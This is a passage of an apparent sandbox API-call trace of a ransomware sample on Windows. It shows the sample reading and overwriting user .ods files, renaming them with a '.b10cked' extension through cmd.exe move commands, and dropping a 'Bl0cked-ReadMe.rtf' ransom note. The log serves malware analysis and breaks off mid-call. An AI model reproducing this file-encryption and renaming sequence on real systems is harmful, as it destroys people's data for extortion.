lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19439345553) returned 1 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.604] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb87b [0137.606] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbd63 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbd63 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.607] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.607] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5eb0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.608] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24240, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5eb3 [0137.608] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5eb0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24240, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5eb3 [0137.608] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IJFqBHm_BK63v.ods", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IJFqBHm_BK63v.ods", cchWideChar=17, lpMultiByteStr=0x13286f4, 
cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IJFqBHm_BK63v.ods", lpUsedDefaultChar=0x0) returned 17 [0137.612] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbd63 [0137.612] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.612] CloseHandle (hObject=0x114) returned 1 [0137.613] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\IJFqBHm_BK63v.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS") returned 0x2d [0137.613] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0137.614] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, 
dwProcessId=0xe0c, dwThreadId=0xe1c)) returned 1 [0137.631] CloseHandle (hObject=0x110) returned 1 [0137.631] CloseHandle (hObject=0x114) returned 1 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 1 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.632] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.632] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.632] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.632] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0137.632] CharUpperBuffW (in: lpsz="type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.632] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.632] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xde8, dwThreadId=0x664)) returned 1 [0137.637] CloseHandle (hObject=0x110) returned 1 [0137.637] CloseHandle (hObject=0x114) returned 1 [0137.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0137.637] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.637] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.637] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\iu1veicz.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19442732607) returned 1 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12f30 [0137.639] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13418 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13418 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.641] ReadFile (in: 
hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a0b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.641] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a0b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39435, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a0d [0137.641] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a0b, 